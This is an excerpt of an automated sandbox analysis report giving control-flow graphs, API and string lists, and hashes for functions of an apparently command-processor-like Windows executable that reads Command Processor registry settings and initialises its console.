7ff706eda920 567->576 568->539 576->544
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$P<dwj`$\XCOPY.EXE$h
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 388421343-544629229
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5cbed98a74921cf9e0d604249510f28a7cbe56b949df4b03d634635dbaf72208
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76F12A32A18B82C6EA60AB11AC647BBF7E4FF85790F954135DA4D43694DF3CE446CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC5554 Relevance: 47.5, APIs: 18, Strings: 9, Instructions: 295registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 579 7ff706ec5554-7ff706ec55b9 call 7ff706eca640 582 7ff706ec55bc-7ff706ec55e8 RegOpenKeyExW 579->582 583 7ff706ec5887-7ff706ec588e 582->583 584 7ff706ec55ee-7ff706ec5631 RegQueryValueExW 582->584 583->582 587 7ff706ec5894-7ff706ec58db time srand call 7ff706ec8f80 583->587 585 7ff706ec5637-7ff706ec5675 RegQueryValueExW 584->585 586 7ff706ecf248-7ff706ecf24d 584->586 588 7ff706ec5677-7ff706ec567c 585->588 589 7ff706ec568e-7ff706ec56cc RegQueryValueExW 585->589 591 7ff706ecf24f-7ff706ecf25b 586->591 592 7ff706ecf260-7ff706ecf265 586->592 593 7ff706ec5682-7ff706ec5687 588->593 594 7ff706ecf28b-7ff706ecf290 588->594 595 7ff706ec56d2-7ff706ec5710 RegQueryValueExW 589->595 596 7ff706ecf2b6-7ff706ecf2bb 589->596 591->585 592->585 598 7ff706ecf26b-7ff706ecf286 _wtol 592->598 593->589 594->589 603 7ff706ecf296-7ff706ecf2b1 _wtol 594->603 601 7ff706ec5712-7ff706ec5717 595->601 602 7ff706ec5729-7ff706ec5767 RegQueryValueExW 595->602 599 7ff706ecf2bd-7ff706ecf2c9 596->599 600 7ff706ecf2ce-7ff706ecf2d3 596->600 598->585 599->595 600->595 604 7ff706ecf2d9-7ff706ecf2f4 _wtol 600->604 605 7ff706ec571d-7ff706ec5722 601->605 606 7ff706ecf2f9-7ff706ecf2fe 601->606 607 7ff706ec579f-7ff706ec57dd RegQueryValueExW 602->607 608 7ff706ec5769-7ff706ec576e 602->608 603->589 604->595 605->602 606->602 609 7ff706ecf304-7ff706ecf31a wcstol 606->609 612 7ff706ec57e3-7ff706ec57e8 607->612 613 7ff706ecf3a9 607->613 610 7ff706ecf320-7ff706ecf325 608->610 611 7ff706ec5774-7ff706ec578f 608->611 609->610 614 7ff706ecf34b 610->614 615 7ff706ecf327-7ff706ecf33f wcstol 610->615 616 7ff706ec5795-7ff706ec5799 611->616 617 7ff706ecf357-7ff706ecf35e 611->617 618 7ff706ecf363-7ff706ecf368 612->618 619 7ff706ec57ee-7ff706ec5809 612->619 622 7ff706ecf3b5-7ff706ecf3b8 613->622 614->617 615->614 616->607 616->617 617->607 623 7ff706ecf38e 618->623 624 7ff706ecf36a-7ff706ecf382 wcstol 618->624 620 7ff706ec580f-7ff706ec5813 619->620 621 7ff706ecf39a-7ff706ecf39d 619->621 620->621 625 7ff706ec5819-7ff706ec5823 620->625 621->613 626 7ff706ecf3be-7ff706ecf3c5 622->626 627 7ff706ec582c 622->627 623->621 624->623 625->622 628 7ff706ec5829 625->628 629 7ff706ec5832-7ff706ec5870 RegQueryValueExW 626->629 627->629 630 7ff706ecf3ca-7ff706ecf3d1 627->630 628->627 631 7ff706ec5876-7ff706ec5882 RegCloseKey 629->631 632 7ff706ecf3dd-7ff706ecf3e2 629->632 630->632 631->583 633 7ff706ecf433-7ff706ecf439 632->633 634 7ff706ecf3e4-7ff706ecf412 ExpandEnvironmentStringsW 632->634 633->631 635 7ff706ecf43f-7ff706ecf44c call 7ff706ebb900 633->635 636 7ff706ecf414-7ff706ecf426 call 7ff706ec13e0 634->636 637 7ff706ecf428 634->637 635->631 638 7ff706ecf42e 636->638 637->638 638->633
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$P<dwj`$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 145004033-1282700733
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1b29ee19206624d46299c0daef502ec5317ed01a61bf97b30fcd13520eff6847
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00E16E3692DB82C6EB50AB10EC6057BF7A0FF89754F805135EA8E02A58DF7CE545CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC37D8 Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 269registrythreadmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 821 7ff706ec37d8-7ff706ec3887 GetCurrentThreadId OpenThread call 7ff706ec04f4 HeapSetInformation RegOpenKeyExW 824 7ff706ece9f8-7ff706ecea3b RegQueryValueExW RegCloseKey 821->824 825 7ff706ec388d-7ff706ec38eb call 7ff706ec5920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff706ecea41-7ff706ecea59 GetThreadLocale 824->827 825->827 831 7ff706ec38f1-7ff706ec3913 memset 825->831 829 7ff706ecea74-7ff706ecea77 827->829 830 7ff706ecea5b-7ff706ecea67 827->830 834 7ff706ecea94-7ff706ecea96 829->834 835 7ff706ecea79-7ff706ecea7d 829->835 830->829 832 7ff706eceaa5 831->832 833 7ff706ec3919-7ff706ec3935 call 7ff706ec4d5c 831->833 836 7ff706eceaa8-7ff706eceab4 832->836 842 7ff706eceae2-7ff706eceaff call 7ff706eb3240 call 7ff706ed8530 call 7ff706ec4c1c 833->842 843 7ff706ec393b-7ff706ec3942 833->843 834->832 835->834 838 7ff706ecea7f-7ff706ecea89 835->838 836->833 839 7ff706eceaba-7ff706eceac3 836->839 838->834 841 7ff706eceacb-7ff706eceace 839->841 844 7ff706eceac5-7ff706eceac9 841->844 845 7ff706ecead0-7ff706eceadb 841->845 853 7ff706eceb00-7ff706eceb0d 842->853 847 7ff706ec3948-7ff706ec3962 _setjmp 843->847 848 7ff706eceb27-7ff706eceb40 _setjmp 843->848 844->841 845->836 851 7ff706eceadd 845->851 847->853 854 7ff706ec3968-7ff706ec396d 847->854 849 7ff706eceb46-7ff706eceb49 848->849 850 7ff706ec39fe-7ff706ec3a05 call 7ff706ec4c1c 848->850 856 7ff706eceb66-7ff706eceb6f call 7ff706ec01b8 849->856 857 7ff706eceb4b-7ff706eceb65 call 7ff706eb3240 call 7ff706ed8530 call 7ff706ec4c1c 849->857 850->824 851->833 867 7ff706eceb15-7ff706eceb1f call 7ff706ec4c1c 853->867 859 7ff706ec396f 854->859 860 7ff706ec39b9-7ff706ec39bb 854->860 882 7ff706eceb71-7ff706eceb82 _setmode 856->882 883 7ff706eceb87-7ff706eceb89 call 7ff706ec86f0 856->883 857->856 868 7ff706ec3972-7ff706ec397d 859->868 863 7ff706ec39c1-7ff706ec39c3 call 7ff706ec4c1c 860->863 864 7ff706eceb20 860->864 879 7ff706ec39c8 863->879 864->848 867->864 870 7ff706ec397f-7ff706ec3984 868->870 871 7ff706ec39c9-7ff706ec39de call 7ff706ebdf60 868->871 870->868 877 7ff706ec3986-7ff706ec39ae call 7ff706ec0580 GetConsoleOutputCP GetCPInfo call 7ff706ec04f4 870->877 871->867 891 7ff706ec39e4-7ff706ec39e8 871->891 897 7ff706ec39b3 877->897 879->871 882->883 888 7ff706eceb8e-7ff706ecebad call 7ff706ec58e4 call 7ff706ebdf60 883->888 902 7ff706ecebaf-7ff706ecebb3 888->902 891->850 895 7ff706ec39ea-7ff706ec39ef call 7ff706ebbe00 891->895 899 7ff706ec39f4-7ff706ec39fc 895->899 897->860 899->870 902->850 903 7ff706ecebb9-7ff706ecec24 call 7ff706ec58e4 GetConsoleOutputCP GetCPInfo call 7ff706ec04f4 call 7ff706ebbe00 call 7ff706ec0580 GetConsoleOutputCP GetCPInfo call 7ff706ec04f4 902->903 903->888
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DisableCMD$P<dwj`$Software\Policies\Microsoft\Windows\System
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2624720099-3347456029
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d1b584beefd050d1a082cbaeab9ce822e33cdb86b884a87b2a7de5c70d799383
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2e94023a2358b464c30370c3d60452e43b25d6dd8544250c40a2bdd9e65d7244
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1b584beefd050d1a082cbaeab9ce822e33cdb86b884a87b2a7de5c70d799383
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1C1B035E087428AF714BB60AC701BBFAA0FF49764FD49139D90E576A5DF3CA4468720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1118 7ff706ec823c-7ff706ec829b FindFirstFileExW 1119 7ff706ec82cd-7ff706ec82df 1118->1119 1120 7ff706ec829d-7ff706ec82a9 GetLastError 1118->1120 1124 7ff706ec8365-7ff706ec837b FindNextFileW 1119->1124 1125 7ff706ec82e5-7ff706ec82ee 1119->1125 1121 7ff706ec82af 1120->1121 1122 7ff706ec82b1-7ff706ec82cb 1121->1122 1126 7ff706ec83d0-7ff706ec83e5 FindClose 1124->1126 1127 7ff706ec837d-7ff706ec8380 1124->1127 1128 7ff706ec82f1-7ff706ec82f4 1125->1128 1126->1128 1127->1119 1129 7ff706ec8386 1127->1129 1130 7ff706ec82f6-7ff706ec8300 1128->1130 1131 7ff706ec8329-7ff706ec832b 1128->1131 1129->1120 1133 7ff706ec8332-7ff706ec8353 GetProcessHeap HeapAlloc 1130->1133 1134 7ff706ec8302-7ff706ec830e 1130->1134 1131->1121 1132 7ff706ec832d 1131->1132 1132->1120 1135 7ff706ec8356-7ff706ec8363 1133->1135 1136 7ff706ec8310-7ff706ec8313 1134->1136 1137 7ff706ec838b-7ff706ec83c2 GetProcessHeap HeapReAlloc 1134->1137 1135->1136 1140 7ff706ec8315-7ff706ec8323 1136->1140 1141 7ff706ec8327 1136->1141 1138 7ff706ed50f8-7ff706ed511e GetLastError FindClose 1137->1138 1139 7ff706ec83c8-7ff706ec83ce 1137->1139 1138->1122 1139->1135 1140->1141 1141->1131
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorFileFindFirstLast
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 873889042-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6e38697bad9fd139ba353cde33be6133a8b2396395a243754ad6cd136da81dc2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86512A35A09B42C6E710AB11ED6817BFBA0FF59B91FC59531CA1D43394DF3CE4558620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC2978 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1142 7ff706ec2978-7ff706ec29b6 1143 7ff706ec29b9-7ff706ec29c1 1142->1143 1143->1143 1144 7ff706ec29c3-7ff706ec29c5 1143->1144 1145 7ff706ece441 1144->1145 1146 7ff706ec29cb-7ff706ec29cf 1144->1146 1147 7ff706ec29d2-7ff706ec29da 1146->1147 1148 7ff706ec2a1e-7ff706ec2a3e FindFirstFileW 1147->1148 1149 7ff706ec29dc-7ff706ec29e1 1147->1149 1151 7ff706ece435-7ff706ece439 1148->1151 1152 7ff706ec2a44-7ff706ec2a5c FindClose 1148->1152 1149->1148 1150 7ff706ec29e3-7ff706ec29eb 1149->1150 1150->1147 1153 7ff706ec29ed-7ff706ec2a1c call 7ff706ec8f80 1150->1153 1151->1145 1154 7ff706ec2a62-7ff706ec2a6e 1152->1154 1155 7ff706ec2ae3-7ff706ec2ae5 1152->1155 1157 7ff706ec2a70-7ff706ec2a78 1154->1157 1158 7ff706ece3f7-7ff706ece3ff 1155->1158 1159 7ff706ec2aeb-7ff706ec2b10 _wcsnicmp 1155->1159 1157->1157 1161 7ff706ec2a7a-7ff706ec2a8d 1157->1161 1159->1154 1162 7ff706ec2b16-7ff706ece3f1 _wcsicmp 1159->1162 1161->1145 1164 7ff706ec2a93-7ff706ec2a97 1161->1164 1162->1154 1162->1158 1165 7ff706ece404-7ff706ece407 1164->1165 1166 7ff706ec2a9d-7ff706ec2ade memmove call 7ff706ec13e0 1164->1166 1167 7ff706ece40b-7ff706ece413 1165->1167 1166->1150 1167->1167 1169 7ff706ece415-7ff706ece42b memmove 1167->1169 1169->1151
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d41d0de1647fb3a2a3695abdeb6e65bb161f4093d64720d8f5557838e3a5be7f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D751E562B1878289EA30AF15AD642BBE690FF54BB4FC44230DE6E077D1DF3CE5468610
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC4D5C Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 268memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 643 7ff706ec4d5c-7ff706ec4e4b InitializeCriticalSection call 7ff706ec58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff706ec0580 call 7ff706ec4a14 call 7ff706ec4ad0 call 7ff706ec5554 GetCommandLineW 654 7ff706ec4e4d-7ff706ec4e54 643->654 654->654 655 7ff706ec4e56-7ff706ec4e61 654->655 656 7ff706ec51cf-7ff706ec51e3 call 7ff706eb3278 call 7ff706ec4c1c 655->656 657 7ff706ec4e67-7ff706ec4e7b call 7ff706ec2e44 655->657 663 7ff706ec4e81-7ff706ec4ec3 GetCommandLineW call 7ff706ec13e0 call 7ff706ebca40 657->663 664 7ff706ec51ba-7ff706ec51ce call 7ff706eb3278 call 7ff706ec4c1c 657->664 663->664 674 7ff706ec4ec9-7ff706ec4ee8 call 7ff706ec417c call 7ff706ec2394 663->674 664->656 678 7ff706ec4eed-7ff706ec4ef5 674->678 678->678 679 7ff706ec4ef7-7ff706ec4f1f call 7ff706ebaa54 678->679 682 7ff706ec4f21-7ff706ec4f30 679->682 683 7ff706ec4f95-7ff706ec4fee GetConsoleOutputCP GetCPInfo call 7ff706ec51ec GetProcessHeap HeapAlloc 679->683 682->683 685 7ff706ec4f32-7ff706ec4f39 682->685 688 7ff706ec5012-7ff706ec5018 683->688 689 7ff706ec4ff0-7ff706ec5006 GetConsoleTitleW 683->689 685->683 687 7ff706ec4f3b-7ff706ec4f77 call 7ff706eb3278 GetWindowsDirectoryW 685->687 695 7ff706ec51b1-7ff706ec51b9 call 7ff706ec4c1c 687->695 696 7ff706ec4f7d-7ff706ec4f90 call 7ff706ec3c24 687->696 693 7ff706ec507a-7ff706ec507e 688->693 694 7ff706ec501a-7ff706ec5024 call 7ff706ec3578 688->694 689->688 692 7ff706ec5008-7ff706ec500f 689->692 692->688 697 7ff706ec5080-7ff706ec50b3 call 7ff706edb89c call 7ff706eb586c call 7ff706eb3240 call 7ff706ec3448 693->697 698 7ff706ec50eb-7ff706ec5161 GetModuleHandleW GetProcAddress * 3 693->698 694->693 709 7ff706ec5026-7ff706ec5030 694->709 695->664 696->683 724 7ff706ec50d2-7ff706ec50d7 call 7ff706eb3278 697->724 725 7ff706ec50b5-7ff706ec50d0 call 7ff706ec3448 * 2 697->725 702 7ff706ec516f 698->702 703 7ff706ec5163-7ff706ec5167 698->703 708 7ff706ec5172-7ff706ec51af free call 7ff706ec8f80 702->708 703->702 707 7ff706ec5169-7ff706ec516d 703->707 707->702 707->708 713 7ff706ec5032-7ff706ec5059 GetStdHandle GetConsoleScreenBufferInfo 709->713 714 7ff706ec5075 call 7ff706edcff0 709->714 718 7ff706ec5069-7ff706ec5073 713->718 719 7ff706ec505b-7ff706ec5067 713->719 714->693 718->693 718->714 719->693 728 7ff706ec50dc-7ff706ec50e6 GlobalFree 724->728 725->728 728->698
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4D9A
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF706EDC6DB), ref: 00007FF706EC58EF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4DBB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC4DCA
